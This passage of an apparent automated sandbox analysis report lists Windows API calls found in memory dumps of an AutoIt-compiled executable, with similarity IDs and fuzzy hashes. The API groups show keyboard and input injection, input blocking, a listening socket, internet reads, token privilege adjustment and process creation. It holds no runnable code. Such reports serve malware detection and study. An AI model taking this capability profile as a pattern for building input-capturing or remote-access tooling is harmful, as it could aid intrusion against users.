                                                                                                                                  • listen.WS2_32(00000000,00000005), ref: 00EF926F
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF9289
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00EF929D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279440585-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                  • _memmove.LIBCMT ref: 00F13020
                                                                                                                                  • _memmove.LIBCMT ref: 00F13135
                                                                                                                                  • _memmove.LIBCMT ref: 00F131DC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1300846289-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EFACD3: inet_addr.WS2_32(00000000), ref: 00EFACF5
                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00EF973D
                                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000000), ref: 00EF9760
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4170576061-0
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00EEF37A
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EEF3AA
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EEF3BF
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF3D0
                                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00EEF3FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2387731787-0
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID: ,d
                                                                                                                                  • API String ID: 4104443479-40157079
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EE439C
                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EE43B8
                                                                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00EE4425
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00EE4483
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F0EFE2
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F1F3C3,?,?,?,?,?), ref: 00F0EFF7
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F0F041
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F1F3C3,?,?,?), ref: 00F0F077
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1423138444-0
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EE221E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: ($|
                                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00EBAE5E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  APIs
                                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EF4A1E,00000000), ref: 00EF55FD
                                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EF5629
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 599397726-0
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00EEEA95
                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EEEAEF
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EEEB3C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1682464887-0
                                                                                                                                  • Opcode ID: 39bdd9620545330cd033e411049016679e01d18e63e85984bd4d7c00e3235c49
                                                                                                                                  • Instruction ID: 522fb7e17fbcf4e99fd9abf1cd8457422fb99824e5309c2aea75233e0e542b2d
                                                                                                                                  • Opcode Fuzzy Hash: 39bdd9620545330cd033e411049016679e01d18e63e85984bd4d7c00e3235c49
                                                                                                                                  • Instruction Fuzzy Hash: 99214A35A00218EFCB00DFA5D894AEEBBF8FF49314F1480A9E905AB351DB31A915CB50
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EE70D8
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00EE7115
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EE711E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 33631002-0
                                                                                                                                  • Opcode ID: 3e77ca0d75d4df1777568f5546f206691b48ed78434fceae1eb41b3ec77cd141
                                                                                                                                  • Instruction ID: 7202e471a23d50ef0a26846aa746b41237e8f0bb3951d32bd0ae52576820b59d
                                                                                                                                  • Opcode Fuzzy Hash: 3e77ca0d75d4df1777568f5546f206691b48ed78434fceae1eb41b3ec77cd141
                                                                                                                                  • Instruction Fuzzy Hash: E211A1B190122CBEE7208BA8DC45FAFBBBCEB08754F104655F901F7190D2B89E0597E1
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  • GetParent.USER32(?), ref: 00F1F4B5
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00EBADDD,?,?,?,00000006,?), ref: 00F1F52F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 314495775-0
                                                                                                                                  • Opcode ID: 74f8709fbf32ff56118c5400eaf4658816d200a8aae32032a15fa8e6407a5f31
                                                                                                                                  • Instruction ID: cd6ae3637ba216f9f9dadd74daadafef39ea901be45b8a38982453232c794722
                                                                                                                                  • Opcode Fuzzy Hash: 74f8709fbf32ff56118c5400eaf4658816d200a8aae32032a15fa8e6407a5f31
                                                                                                                                  • Instruction Fuzzy Hash: DC217131600105AFCB289F28D849AFB3BA6AB49374F1C5264F5359B2E2C7B05D52E750
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00F1F352,?,?,?), ref: 00F0F115
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F0F0FB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1273190321-0
                                                                                                                                  • Opcode ID: ec134e0e4739cb644a30c542238ce6410fcdea7d54fbca4cdc6d8ede6a05c2bb
                                                                                                                                  • Instruction ID: f6d685fad672869b921a88e29e29f7f4a3c8cbe17cf7b77b1f4c5aeeceb72e96
                                                                                                                                  • Opcode Fuzzy Hash: ec134e0e4739cb644a30c542238ce6410fcdea7d54fbca4cdc6d8ede6a05c2bb
                                                                                                                                  • Instruction Fuzzy Hash: A701B131204208EBDB319F24DC45FAA7FA6FBC5364F180124F9155B2E1C7B19816FB90
                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0F47D
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00F1F42E,?,?,?,?,?), ref: 00F0F4A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3420055661-0
                                                                                                                                  • Opcode ID: 9ec23f4578161d674234b4147489b4116ecf81c8e3cb4e28a587d272550c686f
                                                                                                                                  • Instruction ID: 348958ccd90e0057c04b31dfc3c85627e60fe93f2df90bd8b3a5e07a7a675ac0
                                                                                                                                  • Opcode Fuzzy Hash: 9ec23f4578161d674234b4147489b4116ecf81c8e3cb4e28a587d272550c686f
                                                                                                                                  • Instruction Fuzzy Hash: 5CF0177681011CBFEB049F95DC099AE7BB8FF44351F14401AFA02A2160D3B5AA56ABA0
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EFC2E2,?,?,00000000,?), ref: 00EED73F
                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EFC2E2,?,?,00000000,?), ref: 00EED751
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                  • Opcode ID: 6ac274991ddf6286c01436cdc28bda5786ef696ff06cf45f52a15991f8d545f7
                                                                                                                                  • Instruction ID: 34283e00016671f8e53f6107d865c49ad39e87ff357cc09862a38fb4c9b3bb62
                                                                                                                                  • Opcode Fuzzy Hash: 6ac274991ddf6286c01436cdc28bda5786ef696ff06cf45f52a15991f8d545f7
                                                                                                                                  • Instruction Fuzzy Hash: 0CF0A03510432DBBDB21AFA4CC49FEA7BACFF49361F008116B919E6181D730DA40DBA0
                                                                                                                                  APIs
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00EE4B89
                                                                                                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00EE4B9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3536248340-0
                                                                                                                                  • Opcode ID: c838e181f08d9f46a38736ed2b59cfedd7046eef81328d45661d33b1e6119ee7
                                                                                                                                  • Instruction ID: dff41e243f17514e2babc1a0e12042c06c5e6af678191638c30ed578e2a19f40
                                                                                                                                  • Opcode Fuzzy Hash: c838e181f08d9f46a38736ed2b59cfedd7046eef81328d45661d33b1e6119ee7
                                                                                                                                  • Instruction Fuzzy Hash: 4DF0907080038DAFDB058FA1C806BBE7BB4EF00305F048409F951A51D1D3B9C612EF90
                                                                                                                                  APIs
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EDB9EC), ref: 00EDB8C5
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00EDB9EC), ref: 00EDB8D7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00F0F59C
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00F1F3AD,?,?,?,?), ref: 00F0F5C6
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00EA125D,00EC7A43,00EA0F35,?,?,00000001), ref: 00EC8E41
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EC8E4A
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00F10352
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00F0E7AF
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallLongProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4084987330-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                    • Part of subcall function 00EBB736: GetCursorPos.USER32(000000FF), ref: 00EBB749
                                                                                                                                    • Part of subcall function 00EBB736: ScreenToClient.USER32(00000000,000000FF), ref: 00EBB766
                                                                                                                                    • Part of subcall function 00EBB736: GetAsyncKeyState.USER32(00000001), ref: 00EBB78B
                                                                                                                                    • Part of subcall function 00EBB736: GetAsyncKeyState.USER32(00000002), ref: 00EBB799
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00F1F417,?,?,?,?,?,00000001,?), ref: 00F0EA9C
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2356834413-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00EBAF40,?,?,?,?,?), ref: 00EBB83B
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: dafc69c0af78994c2347a8f8e473e48c5289d177e9e0e9deae5234d91a21375c
                                                                                                                                  • Instruction ID: abb1323ad3a5bc197159ae899d97ad2239f8312289d02690f88d98297b858646
                                                                                                                                  • Opcode Fuzzy Hash: dafc69c0af78994c2347a8f8e473e48c5289d177e9e0e9deae5234d91a21375c
                                                                                                                                  • Instruction Fuzzy Hash: DBF0823460020DDFDB18DF24D8919BA3BA6FB05360F184229F9628B2A1D7B1DC60FB90
                                                                                                                                  APIs
                                                                                                                                  • BlockInput.USER32(00000001), ref: 00EF7057
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockInput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                  • Opcode ID: 2fadd2e5dc0c1912819b50be3f7dbc8381c43b4a1cc98d8ead9e3426566bfc0f
                                                                                                                                  • Instruction ID: 312de6f34d8e1081e02888f0f99d402dd30a49ca94b9aa380f8b46e355a24b16
                                                                                                                                  • Opcode Fuzzy Hash: 2fadd2e5dc0c1912819b50be3f7dbc8381c43b4a1cc98d8ead9e3426566bfc0f
                                                                                                                                  • Instruction Fuzzy Hash: B6E048352142045FC710DF69D404D96F7DDAF58750F00942AFB49E7251DEB0EC009BA0
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F0F41A
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: a2553332158f36889910805c1d03558bee6eb742b97434016b835fb80b43663d
                                                                                                                                  • Instruction ID: af76466b0a6a2fef567ff77840aceb3e7bcd61d55618d576ae319a437e78be3d
                                                                                                                                  • Opcode Fuzzy Hash: a2553332158f36889910805c1d03558bee6eb742b97434016b835fb80b43663d
                                                                                                                                  • Instruction Fuzzy Hash: B0F06D31240249AFDB21DF68DC05FC63BA5FB05360F188418FA51A72E1CBB16820FBA4
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00EBACC7
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: c757a5c1255b96fc34f5dafde19b117a7cd3a47155790b9c9215b41a8c1bf392
                                                                                                                                  • Instruction ID: 5c22efdd52948f122077e18954f3881492ab52c7e4bb4e7334b81afcc9adf6d0
                                                                                                                                  • Opcode Fuzzy Hash: c757a5c1255b96fc34f5dafde19b117a7cd3a47155790b9c9215b41a8c1bf392
                                                                                                                                  • Instruction Fuzzy Hash: C3E0EC35240208FBCF15AFA0DC52EA93B66FB49354F188428F6556B2A1CA73A522EB51
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00F1F3D4,?,?,?,?,?,?), ref: 00F0F450
                                                                                                                                    • Part of subcall function 00F0E13E: _memset.LIBCMT ref: 00F0E14D
                                                                                                                                    • Part of subcall function 00F0E13E: _memset.LIBCMT ref: 00F0E15C
                                                                                                                                    • Part of subcall function 00F0E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F63EE0,00F63F24), ref: 00F0E18B
                                                                                                                                    • Part of subcall function 00F0E13E: CloseHandle.KERNEL32 ref: 00F0E19D
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2364484715-0
                                                                                                                                  • Opcode ID: 49307472940d70345d91beb8d851e82e04de10b0d0d7652cb2997aaff6cac9ad
                                                                                                                                  • Instruction ID: a078d7554726c6dda69ab3f6d35f6cac8c48e2eada6f7b1d354712216bb710d4
                                                                                                                                  • Opcode Fuzzy Hash: 49307472940d70345d91beb8d851e82e04de10b0d0d7652cb2997aaff6cac9ad
                                                                                                                                  • Instruction Fuzzy Hash: 65E04636100208DFCB21EF18DC05E9A37A2FB08350F058010FA00572B2C771A821FF40
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00F0F3D0
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: 51ed7efff5e8cb177d28f74686c79436519b55ff38a19d34fbc75f14da766ff1
                                                                                                                                  • Instruction ID: e233416d1bf3e53d9b13c42ea10e935f1dd056a596126d50d8f4294c49f697b7
                                                                                                                                  • Opcode Fuzzy Hash: 51ed7efff5e8cb177d28f74686c79436519b55ff38a19d34fbc75f14da766ff1
                                                                                                                                  • Instruction Fuzzy Hash: 7FE0173424020CEFCB01DF98D845E8A3BA5FB1A350F040054FD048B362C7B2A830EBA1
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00F0F3A1
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: 5ceb25acc9b352ffcaff188169e681e028bf80614b5fa31d02f7cf012aa9fcba
                                                                                                                                  • Instruction ID: de8c503cdcef0cfb286bbeabd3d31ab6df11901f1e373528b1cdf09e966c61d9
                                                                                                                                  • Opcode Fuzzy Hash: 5ceb25acc9b352ffcaff188169e681e028bf80614b5fa31d02f7cf012aa9fcba
                                                                                                                                  • Instruction Fuzzy Hash: E3E0173424420CEFCB01DF98DC45E8A3BA5FB1A350F040054FD048B361C7B2A830EBA1
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                    • Part of subcall function 00EBB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00EBB85B), ref: 00EBB926
                                                                                                                                    • Part of subcall function 00EBB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00EBB85B,00000000,?,?,00EBAF1E,?,?), ref: 00EBB9BD
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00EBAF1E,?,?), ref: 00EBB864
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2797419724-0
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EC8E1F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00EC6AE9,00F567D8,00000014), ref: 00ECA937
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00EFA7A5
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00EFA7B7
                                                                                                                                  • DestroyWindow.USER32 ref: 00EFA7C5
                                                                                                                                  • GetDesktopWindow.USER32 ref: 00EFA7DF
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00EFA7E6
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00EFA927
                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00EFA937
                                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFA97F
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00EFA98B
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EFA9C5
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFA9E7
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFA9FA
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFAA05
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00EFAA0E
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFAA1D
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00EFAA26
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFAA2D
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00EFAA38
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00EFAA4A
                                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F2D9BC,00000000), ref: 00EFAA60
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00EFAA70
